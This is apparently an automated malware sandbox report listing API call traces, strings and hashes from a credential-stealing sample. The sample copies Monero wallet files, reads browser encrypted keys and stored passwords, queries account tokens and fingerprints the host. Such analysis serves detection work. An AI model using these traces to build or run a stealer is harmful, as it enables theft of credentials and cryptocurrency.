                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 3240024479-1526165396
                  • Opcode ID: dc283220d42f7f2b1e94ddbd319b9422fd54c732b3948273566e8916ce5bf8fd
                  • Instruction ID: 897f6d52fafec4b4bcda26ce9ca47b3c29efa733c186213efcc7e5c6945f611d
                  • Opcode Fuzzy Hash: dc283220d42f7f2b1e94ddbd319b9422fd54c732b3948273566e8916ce5bf8fd
                  • Instruction Fuzzy Hash: BB51CB709101499BEB18FF68C996AED7779FF50300F504029E40ADA5D2EF386B46DBA3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen
                  • String ID:
                  • API String ID: 2001356338-0
                  • Opcode ID: 5f88d24c312aed08593b7aad40eee8d267fea33eb172329565d2ff4055abd22e
                  • Instruction ID: 5401260c5da297be346dd3f01caa4dd71f06bc6803a8bb17ffdc995acd2d8407
                  • Opcode Fuzzy Hash: 5f88d24c312aed08593b7aad40eee8d267fea33eb172329565d2ff4055abd22e
                  • Instruction Fuzzy Hash: 2FC197B59001199BCB18FFA4DC89FEA7378FB64304F004599F50AE7192DB74AA85CF92
                  APIs
                    • Part of subcall function 00888DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00888E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 008842EC
                  • lstrcat.KERNEL32(?,015DDC80), ref: 0088430B
                  • lstrcat.KERNEL32(?,?), ref: 0088431F
                  • lstrcat.KERNEL32(?,015DCE80), ref: 00884333
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 00888D90: GetFileAttributesA.KERNEL32(00000000,?,00871B54,?,?,0089564C,?,?,00890E1F), ref: 00888D9F
                    • Part of subcall function 00879CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00879D39
                    • Part of subcall function 008799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008799EC
                    • Part of subcall function 008799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00879A11
                    • Part of subcall function 008799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00879A31
                    • Part of subcall function 008799C0: ReadFile.KERNEL32(000000FF,?,00000000,0087148F,00000000), ref: 00879A5A
                    • Part of subcall function 008799C0: LocalFree.KERNEL32(0087148F), ref: 00879A90
                    • Part of subcall function 008799C0: CloseHandle.KERNEL32(000000FF), ref: 00879A9A
                    • Part of subcall function 008893C0: GlobalAlloc.KERNEL32(00000000,008843DD,008843DD), ref: 008893D3
                  • StrStrA.SHLWAPI(?,015DDDB8), ref: 008843F3
                  • GlobalFree.KERNEL32(?), ref: 00884512
                    • Part of subcall function 00879AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00874EEE,00000000,00000000), ref: 00879AEF
                    • Part of subcall function 00879AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00874EEE,00000000,?), ref: 00879B01
                    • Part of subcall function 00879AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00874EEE,00000000,00000000), ref: 00879B2A
                    • Part of subcall function 00879AC0: LocalFree.KERNEL32(?,?,?,?,00874EEE,00000000,?), ref: 00879B3F
                  • lstrcat.KERNEL32(?,00000000), ref: 008844A3
                  • StrCmpCA.SHLWAPI(?,008908D1), ref: 008844C0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 008844D2
                  • lstrcat.KERNEL32(00000000,?), ref: 008844E5
                  • lstrcat.KERNEL32(00000000,00890FB8), ref: 008844F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                  • String ID:
                  • API String ID: 3541710228-0
                  • Opcode ID: 9b2aedd6ece52b1e38616b94fe7049e5482a8ad1bb450e67f4df297ccbb234e6
                  • Instruction ID: 7b3f3ee4ba2ed77e80c93d85bd412737c8e39e583d3f039e09016da59ca58002
                  • Opcode Fuzzy Hash: 9b2aedd6ece52b1e38616b94fe7049e5482a8ad1bb450e67f4df297ccbb234e6
                  • Instruction Fuzzy Hash: 1F713376900208ABDB14FBE4DC85FEE7779FB58300F048598E609D6192EA34DB45CB92
                  APIs
                    • Part of subcall function 008712A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008712B4
                    • Part of subcall function 008712A0: RtlAllocateHeap.NTDLL(00000000), ref: 008712BB
                    • Part of subcall function 008712A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008712D7
                    • Part of subcall function 008712A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008712F5
                    • Part of subcall function 008712A0: RegCloseKey.ADVAPI32(?), ref: 008712FF
                  • lstrcat.KERNEL32(?,00000000), ref: 0087134F
                  • lstrlen.KERNEL32(?), ref: 0087135C
                  • lstrcat.KERNEL32(?,.keys), ref: 00871377
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                    • Part of subcall function 00888B60: GetSystemTime.KERNEL32(00890E1A,015D9C18,008905AE,?,?,008713F9,?,0000001A,00890E1A,00000000,?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 00888B86
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00871465
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                    • Part of subcall function 008799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008799EC
                    • Part of subcall function 008799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00879A11
                    • Part of subcall function 008799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00879A31
                    • Part of subcall function 008799C0: ReadFile.KERNEL32(000000FF,?,00000000,0087148F,00000000), ref: 00879A5A
                    • Part of subcall function 008799C0: LocalFree.KERNEL32(0087148F), ref: 00879A90
                    • Part of subcall function 008799C0: CloseHandle.KERNEL32(000000FF), ref: 00879A9A
                  • DeleteFileA.KERNEL32(00000000), ref: 008714EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                  • API String ID: 3478931302-218353709
                  • Opcode ID: a4a62bdc993b18da633766df81a0980033c1083a6940a7580858ac190e390ea3
                  • Instruction ID: 2610062a2ac6dc627db40fb79ff3f7f41b17186a7fd618e3d4c91a5fd47fdd32
                  • Opcode Fuzzy Hash: a4a62bdc993b18da633766df81a0980033c1083a6940a7580858ac190e390ea3
                  • Instruction Fuzzy Hash: E25144B195011857DB19FB64DD96BED733CFB50700F4041A9B60AE20D2EE346B86CBA7
                  APIs
                    • Part of subcall function 008772D0: memset.MSVCRT ref: 00877314
                    • Part of subcall function 008772D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0087733A
                    • Part of subcall function 008772D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008773B1
                    • Part of subcall function 008772D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0087740D
                    • Part of subcall function 008772D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00877452
                    • Part of subcall function 008772D0: HeapFree.KERNEL32(00000000), ref: 00877459
                  • lstrcat.KERNEL32(00000000,008917FC), ref: 00877606
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00877648
                  • lstrcat.KERNEL32(00000000, : ), ref: 0087765A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 0087768F
                  • lstrcat.KERNEL32(00000000,00891804), ref: 008776A0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 008776D3
                  • lstrcat.KERNEL32(00000000,00891808), ref: 008776ED
                  • task.LIBCPMTD ref: 008776FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                  • String ID: :
                  • API String ID: 3191641157-3653984579
                  • Opcode ID: 8cfeaffb784648441a2e8d3729aee433f90c5a327cf17e2294d1047e6fdde894
                  • Instruction ID: 4003e79a26a7e34e4f9cf70db9960584adbb258eafabeca879cc480b25c10265
                  • Opcode Fuzzy Hash: 8cfeaffb784648441a2e8d3729aee433f90c5a327cf17e2294d1047e6fdde894
                  • Instruction Fuzzy Hash: 42312171904109EBCB04EBF8DC99DFE7774FB64301B148118E116E72A6DA34E947DB62
                  APIs
                  • memset.MSVCRT ref: 00877314
                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0087733A
                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008773B1
                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0087740D
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00877452
                  • HeapFree.KERNEL32(00000000), ref: 00877459
                  • task.LIBCPMTD ref: 00877555
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$EnumFreeOpenProcessValuememsettask
                  • String ID: Password
                  • API String ID: 2808661185-3434357891
                  • Opcode ID: f5eda99e5df88005bebf4351a6454ea2136028867a56ded9ea49171bf435ac9e
                  • Instruction ID: f8c9f962841549527e528082e8789f3b9357f0af8893482f4768f86608679cc5
                  • Opcode Fuzzy Hash: f5eda99e5df88005bebf4351a6454ea2136028867a56ded9ea49171bf435ac9e
                  • Instruction Fuzzy Hash: 68611AB59041689BDB24DB54CC85BDAB7B8FF44304F00C1E9E68DA6145EBB09BC9CFA1
                  APIs
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                    • Part of subcall function 008747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00874839
                    • Part of subcall function 008747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00874849
                  • InternetOpenA.WININET(00890DF7,00000001,00000000,00000000,00000000), ref: 0087610F
                  • StrCmpCA.SHLWAPI(?,015DE4A0), ref: 00876147
                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0087618F
                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 008761B3
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 008761DC
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0087620A
                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00876249
                  • InternetCloseHandle.WININET(?), ref: 00876253
                  • InternetCloseHandle.WININET(00000000), ref: 00876260
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                  • String ID:
                  • API String ID: 2507841554-0
                  • Opcode ID: 4a27f3c9b6baf86efca0fd2060ae5fc45780251877d6d3ccfce8f743ffa7365e
                  • Instruction ID: 0e4891e6db0ecc7c90b93b5f46b7740016c84ef89cb714310d3ecf08b5118bf1
                  • Opcode Fuzzy Hash: 4a27f3c9b6baf86efca0fd2060ae5fc45780251877d6d3ccfce8f743ffa7365e
                  • Instruction Fuzzy Hash: 46518471900218ABDB24DF90DC49BEE7778FB04705F108198B609E71D5EB74AA89CF66
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                  • lstrlen.KERNEL32(00000000), ref: 0087BC9F
                    • Part of subcall function 00888E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00888E52
                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0087BCCD
                  • lstrlen.KERNEL32(00000000), ref: 0087BDA5
                  • lstrlen.KERNEL32(00000000), ref: 0087BDB9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                  • API String ID: 3073930149-1079375795
                  • Opcode ID: b0147d4411b59534dc39f5241277931e3204093ceffe6086033456f541366e3c
                  • Instruction ID: b164c78a9623224f28466f6ba4cfb86f3ced93782de0115ddf55d089760a630e
                  • Opcode Fuzzy Hash: b0147d4411b59534dc39f5241277931e3204093ceffe6086033456f541366e3c
                  • Instruction Fuzzy Hash: 65B10D719101189AEB08FBA8CD96EEE7739FF54300F404169F516E21D2EF386A49CB63
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess$DefaultLangUser
                  • String ID: *
                  • API String ID: 1494266314-163128923
                  • Opcode ID: 6ef009b618e4dc2276d47103e5047166f93c4b8803c18622eaab8df07a1582e7
                  • Instruction ID: 13cce14c622e3fe2a320bd970416868f695c2265c80d78516b35b0f84a25d382
                  • Opcode Fuzzy Hash: 6ef009b618e4dc2276d47103e5047166f93c4b8803c18622eaab8df07a1582e7
                  • Instruction Fuzzy Hash: 31F03031908249EFD344EFE0A90972C7B70FB14702F040298E609C62A1EA724A929B96
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00874FCA
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00874FD1
                  • InternetOpenA.WININET(00890DDF,00000000,00000000,00000000,00000000), ref: 00874FEA
                  • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00875011
                  • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00875041
                  • InternetCloseHandle.WININET(?), ref: 008750B9
                  • InternetCloseHandle.WININET(?), ref: 008750C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                  • String ID:
                  • API String ID: 3066467675-0
                  • Opcode ID: bbcb6233397d03f7d4155c64651748deeb24f4407a7f8f160aa317c777e4c053
                  • Instruction ID: 4b520247f3e5e4e32ac5351d1dcaebd6ec6e2239dc15eb3dee42d7da063272e5
                  • Opcode Fuzzy Hash: bbcb6233397d03f7d4155c64651748deeb24f4407a7f8f160aa317c777e4c053
                  • Instruction Fuzzy Hash: B73108B4A0021CABDB20CF94DC85BDCB7B4FB48704F1081D9E609A7291DBB06AC58F99
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,015DD9F8,00000000,?,00890E2C,00000000,?,00000000), ref: 00888130
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00888137
                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00888158
                  • wsprintfA.USER32 ref: 008881AC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                  • String ID: %d MB$@
                  • API String ID: 2922868504-3474575989
                  • Opcode ID: dd315d7d7042d2fae915ac98aec7447e691016b245ea001a3f5a675007893c34
                  • Instruction ID: 095c46b20e3dc8931d5672bee55a0b9eb4371950234fda53481b693af03cbd81
                  • Opcode Fuzzy Hash: dd315d7d7042d2fae915ac98aec7447e691016b245ea001a3f5a675007893c34
                  • Instruction Fuzzy Hash: 79210BB1E44218ABDB14EFD4CC49FAEB7B8FB44B14F104609F615BB280DB7859018BA5
                  APIs
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00888426
                  • wsprintfA.USER32 ref: 00888459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0088847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 0088848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00888499
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                  • RegQueryValueExA.ADVAPI32(00000000,015DD968,00000000,000F003F,?,00000400), ref: 008884EC
                  • lstrlen.KERNEL32(?), ref: 00888501
                  • RegQueryValueExA.ADVAPI32(00000000,015DD818,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00890B34), ref: 00888599
                  • RegCloseKey.ADVAPI32(00000000), ref: 00888608
                  • RegCloseKey.ADVAPI32(00000000), ref: 0088861A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                  • String ID: %s\%s
                  • API String ID: 3896182533-4073750446
                  • Opcode ID: d465eb58e72e421c7f6cd948931420d9edf3621ec74bddff67f22c5bed132bee
                  • Instruction ID: f724480fcc1716138c27b4034c315ce5f89ad5bd897309968dc3cf014172ae6f
                  • Opcode Fuzzy Hash: d465eb58e72e421c7f6cd948931420d9edf3621ec74bddff67f22c5bed132bee
                  • Instruction Fuzzy Hash: AD213B7190021CABDB24DB94DC85FE9B3B8FB58700F40C2D8E609A6181DF716A82CFD4
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008876A4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 008876AB
                  • RegOpenKeyExA.ADVAPI32(80000002,015CB7A8,00000000,00020119,00000000), ref: 008876DD
                  • RegQueryValueExA.ADVAPI32(00000000,015DDAE8,00000000,00000000,?,000000FF), ref: 008876FE
                  • RegCloseKey.ADVAPI32(00000000), ref: 00887708
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID: Windows 11
                  • API String ID: 3225020163-2517555085
                  • Opcode ID: 066a17d722f05ad050400740137376981fea9aff29e46be03037c6f9375cafd0
                  • Instruction ID: cdc97e17afdce6510e68df9e5c9ae8a9e4fa426dfdbe9b76ef06e93a8106e032
                  • Opcode Fuzzy Hash: 066a17d722f05ad050400740137376981fea9aff29e46be03037c6f9375cafd0
                  • Instruction Fuzzy Hash: 360162B5A04308BFDB00EBE4DD49F6DB7B8FB58701F108554FA05D72A2EA709945CB51
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00887734
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0088773B
                  • RegOpenKeyExA.ADVAPI32(80000002,015CB7A8,00000000,00020119,008876B9), ref: 0088775B
                  • RegQueryValueExA.ADVAPI32(008876B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0088777A
                  • RegCloseKey.ADVAPI32(008876B9), ref: 00887784
                  Strings
                  Memory Dump Source
